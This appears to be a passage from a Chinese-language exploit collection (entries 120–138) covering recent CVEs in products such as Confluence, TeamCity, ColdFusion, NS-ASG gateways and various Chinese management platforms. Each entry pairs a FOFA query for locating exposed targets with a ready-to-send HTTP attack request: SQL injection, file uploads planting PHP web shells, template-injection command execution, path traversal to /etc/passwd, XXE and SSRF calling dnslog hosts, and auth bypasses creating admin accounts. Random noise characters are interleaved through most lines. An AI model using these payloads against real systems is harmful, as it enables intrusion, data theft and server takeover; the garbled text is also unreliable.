6 c4 {7 A5 C& W0 v1 [+ v7 XSec-Fetch-Mode: cors4 O: T- l3 C5 I1 ?4 l, K
Sec-Fetch-Site: same-origin
/ m5 i& a6 n) d& GX-Forwarded-For: 1.1.1.1% A/ Z/ c" R j4 @ ]
X-Originating-Ip: 1.1.1.11 h% l' u( ~/ } K. ]
X-Remote-Ip: 1.1.1.1
8 t2 k, P& @, J! R: h" iX-Remote-Addr: 1.1.1.1! {2 b4 h G- V! c1 M3 e3 u
Te: trailers6 ?/ F. t& ~% X/ L% y" K# P
Connection: close8 u: p1 [/ R% E2 \6 R) |
9 o* Z8 | R" n( g# O1 C: e
src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456/ u `6 y7 k6 b
; f) i2 S& |; R, Y s% D+ H ~
5 b/ }+ w7 P! I7 R& ]7 ] d# v
120. 北京百绰智能S40管理平台导入web.php任意文件上传
, ?4 A( k) n# T9 U) _ m4 eCVE-2024-1253
/ D2 B8 W* b3 v, s. M" A. p1 OFOFA:title="Smart管理平台": z+ t' I) o/ ^7 h5 H5 {
POST /useratte/web.php? HTTP/1.1
; C! h a1 i) A) k' e1 ~. mHost: ip:port
4 S' T( V5 U5 h _4 G: ?7 LCookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
" H, w j" ?* L4 K" o/ TUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
/ K% ~: b# |' k; i3 W# DAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
" ] ], e! s" P" s* }Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.24 F' g8 c' l( N |
Accept-Encoding: gzip, deflate6 I* g+ `7 c0 {6 g( _
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328( F6 v6 Q: P0 H; w8 z
Content-Length: 597
4 u. p& s# R1 h9 i' b# P7 u6 gOrigin: https://ip:port7 }. p0 c4 G8 m$ u! [: p/ j8 @
Referer: https://ip:port/sysmanage/licence.php5 {) z* Q8 K+ M0 I9 m
Upgrade-Insecure-Requests: 1
7 [0 B& W2 y# |) CSec-Fetch-Dest: document; U, a5 _, H. J, C. W: ]
Sec-Fetch-Mode: navigate: }4 k* s: m9 W3 f
Sec-Fetch-Site: same-origin
5 R) |) a/ ^3 J8 i# F. z& e5 R2 zSec-Fetch-User: ?1& W2 V) O4 h- @8 ?. V6 |
Te: trailers
6 X2 P$ m+ q; dConnection: close
: `2 u; D p( H$ A, s( Y L) P3 F
3 d7 }7 u" ~, C4 z4 N-----------------------------423289041236658752706300793283 q" X% s( K+ u
Content-Disposition: form-data; name="file_upload"; filename="2.php"
, T- V u( d5 u8 y+ dContent-Type: application/octet-stream( i* z' |( H( ~/ g* q& {1 P& E
& N) g* ^- P6 L5 _( g7 v
<?php phpinfo()?>
) w+ u! W0 t+ B5 a5 H-----------------------------42328904123665875270630079328$ j! p! ^' t1 k' R2 k2 }9 M. g' Z
Content-Disposition: form-data; name="id_type"
, L/ [3 k7 P- j- i5 c7 h7 g2 l) @
1
) y, X" k* q9 N0 {0 R; s" M-----------------------------42328904123665875270630079328
1 @% M) s# m9 s D' {1 f' iContent-Disposition: form-data; name="1_ck"
/ h* m) q3 _8 g# d3 o
: r1 e( X" ?6 d5 c& K1_radhttp
; \* @3 e I( m# @3 K-----------------------------42328904123665875270630079328
5 n% v% a, I3 z' q# [: d3 fContent-Disposition: form-data; name="mode"
, Y( ~* W) b) }# \* q$ d
' U9 e5 @# F( o' Q, }% Limport: Y2 q% G, j! V: R5 e2 E
-----------------------------42328904123665875270630079328; Z, c+ w7 Z3 m% v7 i& v
/ Z, X+ V0 s$ L$ t/ @/ ?
' r9 E1 u- S; o
文件路径/upload/2.php3 n0 |) x$ H- ~2 m! b
. E% K) L. Z4 O& j* W4 v121. 北京百绰智能S42管理平台userattestation.php任意文件上传
3 T8 p6 z5 q& K" BCVE-2024-1918: G. |: f1 e' G2 V& p/ z) I
FOFA:title="Smart管理平台"& h, h5 k6 W1 r# Q
POST /useratte/userattestation.php HTTP/1.1
/ Q5 |# a; ]* kHost: 192.168.40.130:8443
- S% O. m2 j( `# k$ r0 }Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50: f. V' M+ y& Z/ o7 S
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
& @! E: m/ e: _4 j9 OAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
$ x# d$ O7 L& aAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2* @3 D, {7 v2 ~
Accept-Encoding: gzip, deflate
0 Q# z: E7 R- U, wContent-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
, A7 ~* M& [# S9 @* H7 |8 G0 W( z/ [Content-Length: 5927 Q7 Y0 z7 Y+ ]
Origin: https://192.168.40.130:8443
. l2 M8 g* q' z7 ^$ p2 @ [5 _ AUpgrade-Insecure-Requests: 1" a8 M8 g; w5 W- @( C0 n1 y
Sec-Fetch-Dest: document5 y9 P4 i, D$ Y6 r
Sec-Fetch-Mode: navigate
+ U4 u/ Q" g: g: ~Sec-Fetch-Site: same-origin
& P8 e& [8 P3 }" RSec-Fetch-User: ?18 A3 e( v/ `& I- u3 N
Te: trailers# c) @( N0 g) f" s
Connection: close* ?4 Y7 |- F3 D7 {7 ~/ o [/ g
/ [- O( O. @; @" @: s; z
-----------------------------42328904123665875270630079328
/ M! D3 F: z9 e7 u+ [4 q4 eContent-Disposition: form-data; name="web_img"; filename="1.php"
+ S# |4 d2 ?% W TContent-Type: application/octet-stream
; |1 I6 L) O9 O" ^) n
" k' Q; i' g [" ]% n<?php phpinfo();?>
- |6 ~. [! S+ n3 R7 g-----------------------------42328904123665875270630079328
, Y3 r! P9 `+ Z. h( mContent-Disposition: form-data; name="id_type"" ~# S$ E; k& p% |1 y
2 e- J) Z4 e! {1
. m6 e* r# I. i( j" w. m- ~" P% N-----------------------------42328904123665875270630079328
' R, t! p. g$ N) b( ]3 X% pContent-Disposition: form-data; name="1_ck"0 L& L: O. l) t9 l# f f+ f& |9 Q
1 L4 J/ f! m- v. T {& i- y1_radhttp; u2 n5 Z) P% z
-----------------------------423289041236658752706300793286 V. a2 ]( k3 R* a
Content-Disposition: form-data; name="hidwel"
& P- x' _3 V5 t3 v8 f9 a
+ ^8 J( m7 h4 p4 K" sset
2 L" E" G3 z* t: Z: R-----------------------------42328904123665875270630079328
( H: X5 \0 i8 K* K9 W5 m9 Q l9 Q4 D q$ h/ B0 C( J* c! F
+ `8 D& p9 I2 A: {5 Y% m+ l, @
boot/web/upload/weblogo/1.php
d' u( L, N1 a; |. u ^$ Z1 b( `! S. m- F4 t' L3 m7 t& }
122. 北京百绰智能s200管理平台/importexport.php sql注入
" ?3 S' ~) V* T8 TCVE-2024-27718FOFA:title="Smart管理平台"
& J) l ]. S: O其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()
- x0 i x) {+ \1 AGET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.10 |5 ?5 \! G5 c( g2 R& r
Host: x.x.x.x2 V/ O" J9 |' a. p
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0' G. q4 _5 w7 A! `" n' W0 z$ |
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
5 y7 }3 v# i% z, K. A8 oAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
1 E* r5 y0 k1 `# @. l7 QAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
3 P0 r. |: M1 r. H3 ]Accept-Encoding: gzip, deflate, br
2 }& x# O+ B. y" F% J& iUpgrade-Insecure-Requests: 19 y: p" i/ v& f4 @
Sec-Fetch-Dest: document: A- ~8 k n9 |9 w) [2 G% C
Sec-Fetch-Mode: navigate
5 k! s) [- P# A3 b' b8 V' l2 eSec-Fetch-Site: none& G8 R) `6 [& E. _/ m# e" U
Sec-Fetch-User: ?1$ L3 x) z9 C( B7 C( f( R& o' d# l
Te: trailers
, D( l0 L8 ^: UConnection: close% Y4 Q& l& k. P1 _! q
+ E0 d1 w2 b( [! A
* k) C$ C" g# u% y9 q, e$ B123. Atlassian Confluence 模板注入代码执行
( S( p( M, v8 P# }* z+ l0 nFOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
% k% c2 l0 s8 A. I2 P$ [& RPOST /template/aui/text-inline.vm HTTP/1.1
6 x: y/ U, I m4 e! z( sHost: localhost:8090
! L* J- }' r4 nAccept-Encoding: gzip, deflate, br
1 Q" R( B7 Z( _/ V8 BAccept: */*
: R; _4 o& z" [: h6 Q2 {Accept-Language: en-US;q=0.9,en;q=0.8
, r: ]2 H" M. n- Y6 cUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
9 o c7 Y2 a6 \( X3 V+ @Connection: close! @ s3 R- D$ |
Content-Type: application/x-www-form-urlencoded
2 k/ f$ @/ d: b! a7 G
0 I! z4 P# a# |: m% x$ R! dlabel=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))
5 }3 v# \& y$ V- W) C! y
/ n: D C2 Z1 s) p0 N$ G
, R& C) Q( `* O/ a% H- |( V124. 湖南建研工程质量检测系统任意文件上传
( {+ I$ N. G, E0 A! g, eFOFA:body="/Content/Theme/Standard/webSite/login.css"
4 g0 s/ Z! M" T" f$ p6 ]# ZPOST /Scripts/admintool?type=updatefile HTTP/1.1 R; q% B7 e# H0 s0 s
Host: 192.168.40.130:8282
3 f2 k$ n( I1 Q" A3 d- jUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
3 m) J" A7 {( v( `4 j( O7 R" MContent-Length: 72 [5 H( _2 F9 p# Y0 L- T4 n, I d
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8* |* O2 s5 o3 w! T7 |
Accept-Encoding: gzip, deflate, br6 y6 r9 b* w5 j0 R. N% I
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2- n9 b6 s' M |( Y: Z8 \4 y
Connection: close1 Q7 _( I8 @9 k; a) V& ]7 @1 D- e* f
Content-Type: application/x-www-form-urlencoded
. E! r2 w" A0 G' K5 ]8 m
2 }; I' H7 a2 a8 M* E* e* b qfilePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>$ g+ ~+ B) y4 O4 j% S- n6 U( {. r
' ~8 _( [) `1 u4 I5 G( u0 ~5 Y
! P0 |; z" j% Khttp://192.168.40.130:8282/Scripts/abcgcg.aspx
% ^) ]. x* Z7 Q$ ?! b; [: ]9 z9 O; j4 E# K. {: `# Y
125. ConnectWise ScreenConnect身份验证绕过: D4 I" w2 y$ D* R2 Z, q
CVE-2024-1709
( ~7 \9 O6 C( J ]7 oFOFA:icon_hash="-82958153"
& l% B# G+ {( o- g+ W' \https://github.com/watchtowrlabs ... bypass-add-user-poc3 F% L) T5 Y. k" F
3 d1 }; d: C$ J' s7 ^$ P: v8 u
- D% X" `- R) O- e- p使用方法/ M) }( b5 k1 a p$ K
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!# k$ O: q* @, ]) e: w( H3 U& @$ W
3 |2 ^! J. U2 ?+ X z
3 _5 u+ h3 @1 ^- Z1 x创建好用户后直接登录后台,可以执行系统命令。1 S+ u2 L0 B) |7 [# h$ m u" T5 m
7 ^. {, }1 K. F- _" x* C
126. Aiohttp 路径遍历
, B, l* H: O+ Z9 P( F9 uFOFA:title=="ComfyUI"
3 s' I$ f3 n! p0 b2 rGET /static/../../../../../etc/passwd HTTP/1.1
! Q6 g; ]2 n7 w) t6 ^Host: x.x.x.x
/ H. V' U) Z8 b* T. F4 |User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
+ t* r) ?$ D# _8 v2 TConnection: close
( E" s' V3 I: I5 k. V, R% DAccept: */*5 Q& w' ?- F( z( T
Accept-Language: en( a T) Z" i3 a7 H* n
Accept-Encoding: gzip
2 v$ O) f0 g4 W5 e& X
9 L' b/ F, T8 X- C3 A1 t
+ r' r& y# [) G" M/ m127. 广联达Linkworks DataExchange.ashx XXE; V8 \# q( k$ E+ f; }
FOFA:body="Services/Identification/login.ashx"
# F4 I( f+ q, v$ z' bPOST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
$ ], Y* e' o; b5 K* f) CHost: 192.168.40.130:8888
0 f% g( R- K+ H6 J% zUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
) a0 Y3 s5 `5 A9 b5 q7 b( e" `3 UContent-Length: 415
8 |6 V/ }* Q6 k$ _4 F+ FAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
9 h' R! V, b: W" m7 o% qAccept-Encoding: gzip, deflate& o, o0 Q. G; [2 }
Accept-Language: zh-CN,zh;q=0.9
; u! \& U) a) g% v, yConnection: close% h6 y2 D8 z4 \0 O7 F! c2 U
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0! Y' G, M a( F( ~
Purpose: prefetch# O8 |) y# o$ b! S3 T
Sec-Purpose: prefetch;prerender
1 C$ d3 J8 J* `. X1 o8 B$ \8 i5 F7 V8 Q e/ ]( W0 ~9 s
------WebKitFormBoundaryJGgV5l5ta05yAIe0
+ R/ Q1 G9 o$ s0 g; QContent-Disposition: form-data;name="SystemName"0 O& |1 O& X0 Z9 c
/ l( w' L! @! d2 Y1 W$ T6 R" zBIM! O; c1 n. O$ E# [! e% B1 g X
------WebKitFormBoundaryJGgV5l5ta05yAIe07 x9 M |. v- S0 ?& t0 r7 ^& G
Content-Disposition: form-data;name="Params"" F0 E1 g j9 M# Q5 G4 n8 i' r5 {
Content-Type: text/plain) p% |* b) G) g) Q
! f8 x! R) I9 m1 h' U& i<?xml version="1.0" encoding="UTF-8"?>
* J2 O! c4 E9 z: x& Q% k5 {<!DOCTYPE test [4 J$ ?: t+ `+ L1 W4 H, {2 U* Z% @
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
+ @% D0 y6 C; R& w]
# R! a8 n* Y1 y; {>+ e% P0 h9 ] x' n$ p. C
<test>&t;</test>$ I( L/ r6 ]0 H* \
------WebKitFormBoundaryJGgV5l5ta05yAIe0--
" O; e% n2 s7 l2 q% ^* x! f4 I6 W# M5 T6 K4 e, ~
+ l7 l; A/ y, H# J2 x( y8 ?% l( ^" y6 k% R4 ]4 t8 {1 T
128. Adobe ColdFusion 反序列化
9 @) ~. r. J0 S0 u3 Z9 \8 l8 jCVE-2023-38203
' e( ?- m# Q+ P M; _4 g2 _3 uAdobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)
1 d i* R: h% d; m( S# JFOFA:app="Adobe-ColdFusion"1 r# F& f) X. r! ?
PAYLOAD# N: H8 F. U p& z, d
* ]3 O# O$ K( O3 W% P9 [9 o1 X129. Adobe ColdFusion 任意文件读取4 T3 P( T1 R7 l$ x2 P( q
CVE-2024-20767' s+ u2 k( s4 k4 H& }
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request", z3 I! V4 O7 p$ `/ J1 [
第一步,获取uuid2 R! M8 Z7 g: H
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
; v% l7 V, g4 x+ `8 r' s8 jHost: x.x.x.x) v9 y w' l7 A: ^
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36# m: c+ o |1 {- |- n
Accept: */*% _: k, m0 }$ Y
Accept-Encoding: gzip, deflate* A) a# Z; V) l. o0 E. A
Connection: close
. q7 s$ k. K# M
9 ~- S; X! D, m" K/ L
* K) Y6 a; p8 ~, B第二步,读取/etc/passwd文件0 _( o9 R4 _- n6 e' o. H1 l( m
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
* D$ X4 S9 [ d0 }! P7 @Host: x.x.x.x' h& K, Y! G& H1 E6 y3 j- V
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.360 b8 ?' [ D" W$ g
Accept: */*) \" `# @) k8 b9 E
Accept-Encoding: gzip, deflate5 c2 x/ q7 P4 @4 `7 M6 L6 T4 }
Connection: close
- l {; n- Z6 g. ~! {4 }* zuuid: 85f60018-a654-4410-a783-f81cbd5000b9
/ |% w( A: Z- B! \; u; ?3 I) I# |, D( i8 d- t+ X% e
% H0 I( A0 N' Z. X# e5 e
130. Laykefu客服系统任意文件上传
4 r- f6 z) h4 ~* C5 Q- IFOFA:icon_hash="-334624619"
4 ?- G2 U# @5 a! vPOST /admin/users/upavatar.html HTTP/1.1, j4 Y+ F" J% G8 Q5 g4 g3 d+ e. @
Host: 127.0.0.1
4 g: ^2 X9 P: @7 N' ?: BAccept: application/json, text/javascript, */*; q=0.01
. i! Q& b5 D2 f e; B& ^8 M9 IX-Requested-With: XMLHttpRequest) {. Y. d8 Q) D( R2 x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
" @& `( M3 [3 p9 D$ f" @Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR2 k- V. Q, y4 N$ p& {2 p7 @
Accept-Encoding: gzip, deflate
' q/ E' j7 M9 m0 Y1 \& Y4 @+ `Accept-Language: zh-CN,zh;q=0.9+ z1 W/ F4 M% U% V$ l l
Cookie: user_name=1; user_id=3
4 z: v+ {% M- EConnection: close
0 ]- O+ ]+ S8 K S7 k" w. j
7 o. @* M' X: D! T8 n% t# x; Y& D------WebKitFormBoundary3OCVBiwBVsNuB2kR
% }! i; z/ Y# F& C, gContent-Disposition: form-data; name="file"; filename="1.php": i7 |9 L( t, N4 p2 ^1 ]
Content-Type: image/png) d8 M: ]1 b. I+ U
# Z6 Y. j, P( o% }! [<?php phpinfo();@eval($_POST['sec']);?>6 r/ ^% N* C9 i! U. n
------WebKitFormBoundary3OCVBiwBVsNuB2kR--
5 t, g; b6 D3 R4 x3 v! \, Z h% z0 U! l# M% e# D
. L7 B, m" e: S$ w7 {$ y
131. Mini-Tmall <=20231017 SQL注入- Q3 K q4 B/ n& j- z9 ~
FOFA:icon_hash="-2087517259"
; |6 j9 D6 P5 u& X: o% J后台地址:http://localhost:8080/tmall/admin/ z7 Z" D- l! c) {7 A0 O: J8 g
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)
, h& d" L! p# \. R1 D1 ^: _2 l& {5 I; ]8 K5 n6 }" g
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过, ~0 N, w8 ^+ ]+ [& |! j2 Q
CVE-2024-271989 c! p4 O5 B" w( L9 P7 @* z
FOFA:body="Log in to TeamCity"
& n( a" N* t( \: {/ gPOST /pwned?jsp=/app/rest/users;.jsp HTTP/1.14 x# M4 N& @8 a( P, h* k7 u
Host: 192.168.40.130:8111
% p9 Z' y2 O/ TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36' U- E {( D. T) u# w! b
Accept: */*$ g6 e& s- `- g
Content-Type: application/json
5 A' ^5 y t) Y" x2 DAccept-Encoding: gzip, deflate3 o3 N4 J# ?2 a c
~+ T9 a3 S" u n) G3 z
{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}# g" R- c3 x8 U: K( j. I. {
2 X2 H$ A% n$ L, p$ f
B/ J, W$ \3 O- k7 V$ @
CVE-2024-27199) X+ A. u, n. H2 V1 a, n
/res/../admin/diagnostic.jsp& x# N# h) S) g% D2 ?
/.well-known/acme-challenge/../../admin/diagnostic.jsp$ z W: P4 S/ u h; m9 h2 t) t
/update/../admin/diagnostic.jsp( C; k7 j( g1 m) x, p; W0 Q |
) M8 P5 a- z# p5 M3 M
& N3 h- Q6 [( Z8 cCVE-2024-27198-RCE.py
" f& J8 a% |0 p9 l% j( E
; u3 u0 x; e* x5 I4 u133. H5 云商城 file.php 文件上传
+ C# v; {9 `% OFOFA:body="/public/qbsp.php"9 u8 R8 Z* f, r* T T$ @! m# [! q
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1$ q: ]( j l3 f
Host: your-ip
4 L0 F6 X/ K& }8 |( N' U) c1 `1 dUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.364 _' [9 H ~4 f4 G+ V% g1 J
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx% J- J2 M2 O: m5 u; d! ]
w0 o$ H7 {2 S' j: A7 y------WebKitFormBoundaryFQqYtrIWb8iBxUCx* j' @, J6 r! c3 x. @4 F1 o3 r
Content-Disposition: form-data; name="file"; filename="rce.php"+ v4 I5 P2 j4 c$ v3 U1 Z. o( V4 b
Content-Type: application/octet-stream7 H( ~1 X: {7 \9 q
$ }6 @9 Z- l/ P7 T
<?php system("cat /etc/passwd");unlink(__FILE__);?>
- S: F/ i! G/ x6 s. ^------WebKitFormBoundaryFQqYtrIWb8iBxUCx--
" }5 b- e4 `1 W% S: C
9 |/ z/ W( D% M- ~0 `/ ?" g4 g ?
* u& r5 d9 ~: c% M& i: ^5 q. l: P$ x
134. 网康NS-ASG应用安全网关index.php sql注入
2 r2 k4 F W3 L, k1 w* hCVE-2024-2330
, h* f' s i* Q( N7 h a; X/ b5 |" }Netentsec NS-ASG Application Security Gateway 6.3版本% X+ n8 B( T1 o g; {* r
FOFA:app="网康科技-NS-ASG安全网关"- }9 D% f L5 ]
POST /protocol/index.php HTTP/1.1
X- A4 U; ]: j. D6 ?' YHost: x.x.x.x
3 P+ u8 W; V0 j( W* fCookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
5 W4 T2 { X# T* {5 ?3 j6 OUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0# B$ D2 x! G! B6 c( n* ~* E
Accept: */*
' m% ?: B. g) P4 MAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
. k% S3 z. W' ]1 mAccept-Encoding: gzip, deflate$ m6 ]5 j* `6 w! L$ Y ?+ F6 q
Sec-Fetch-Dest: empty
0 f7 ]4 E k$ ~! sSec-Fetch-Mode: cors/ q' R8 a! i3 s( T8 D& a% }
Sec-Fetch-Site: same-origin# U/ \5 N6 m1 g9 o* R4 H
Te: trailers) q6 B: m3 u( M1 a/ [9 B: _$ k6 e" T! q
Connection: close
( H1 Z! i0 i4 ZContent-Type: application/x-www-form-urlencoded
) C, q/ E' U" I# j) AContent-Length: 263
* g% i5 Y$ u: N3 {& Q3 a- E% P/ d: I2 n; r0 l, h. \1 F
jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}. E$ C" Z7 K8 X! ~# X4 a) o
6 G4 p, y* x0 o/ E# J! Z6 H* e9 `4 I2 [3 M8 P
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入0 F' e, _( F8 n$ _% k5 e
CVE-2024-2022
; p! T* _/ A# B4 }* g8 ~Netentsec NS-ASG Application Security Gateway 6.3版本) x; [5 Q" ^* `$ o7 p7 l
FOFA:app="网康科技-NS-ASG安全网关"
* H# c; F, E ~GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.12 n' v& ]' d% T1 ~
Host: x.x.x.x
& o# r2 j9 N7 H9 W/ `$ O" F" QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
) |, t# k, _% Q$ c0 L! gAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
" F. P6 R$ Y1 [0 TAccept-Encoding: gzip, deflate
& U4 ^0 t0 `5 S2 }' o1 F% cAccept-Language: zh-CN,zh;q=0.9; S- `9 i* g5 L( y# n# h6 G4 u
Connection: close
" w+ _! V+ j- {0 n: B, w% |& i) B0 e7 z
( e. Q6 n) b/ l5 M" I7 s$ ]6 A
136. NextChat cors SSRF4 p; z9 n; E7 @' q
CVE-2023-497859 _% f) x }' q- p8 \! C
FOFA:title="NextChat") A; y( @' b3 U$ W5 e" @0 ^
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.14 j* z% I6 X4 {! l, n
Host: x.x.x.x:10000
! m1 J; k( n2 x" P3 {# qUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
) j3 Q7 O* ^6 ~+ ^) s% ]1 \& F ^Connection: close) C, {0 k& o" \1 W
Accept: */*" W0 B! r G2 a, Q5 e! J
Accept-Language: en. A6 o+ `5 g3 [6 I! s5 D
Accept-Encoding: gzip
1 i* w) W0 l; D0 o: Q, Y/ x4 F' m$ M- f
( e: `) j* A% W, U" p137. 福建科立迅通信指挥调度平台down_file.php sql注入
$ m O1 S6 \7 L4 t6 s W* ECVE-2024-2620/ {+ ?% H$ y8 D. O. [3 {
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"1 A! H: b( n5 { D0 t1 P
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
9 J8 M, G1 O7 B: Z1 i, B/ IHost: x.x.x.x
9 V) e i" e* m' iUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.04 p- A8 G) Q i9 F, i/ P
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 J5 d* N/ \ C" @
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
: F, Y, q s; ~, |2 yAccept-Encoding: gzip, deflate, br1 X2 H k# Q8 R" p9 b6 U) C
Connection: close
' k1 k5 A: K, k6 g8 ~4 H# M" lCookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
) A& V. y4 U# _& D6 C% |( |0 dUpgrade-Insecure-Requests: 1( n: j2 {( M% O
. x, @( A1 i; _1 k$ m& K4 ^; z1 J9 W7 n7 q s: P
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
: |2 Q0 v% d1 A5 g* k; L0 ~CVE-2024-2621
2 v8 n2 g1 g: g! q1 @FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
/ ~1 g5 r4 C4 q! g; H3 Y$ w( iGET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
. a# h/ h+ p( w# F0 OHost: x.x.x.x1 A7 f, f7 L1 Y2 \! z1 j
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0* j% x$ t0 `( Q0 H! a7 W) V( V
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
. `' i4 {) c" C+ ], QAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2$ `9 r6 k% K0 u2 ]6 ]' ~& }
Accept-Encoding: gzip, deflate, br
# y0 J' ~; `7 d5 D9 y% PConnection: close
( l4 W* e! i# I( Z- r) gUpgrade-Insecure-Requests: 1
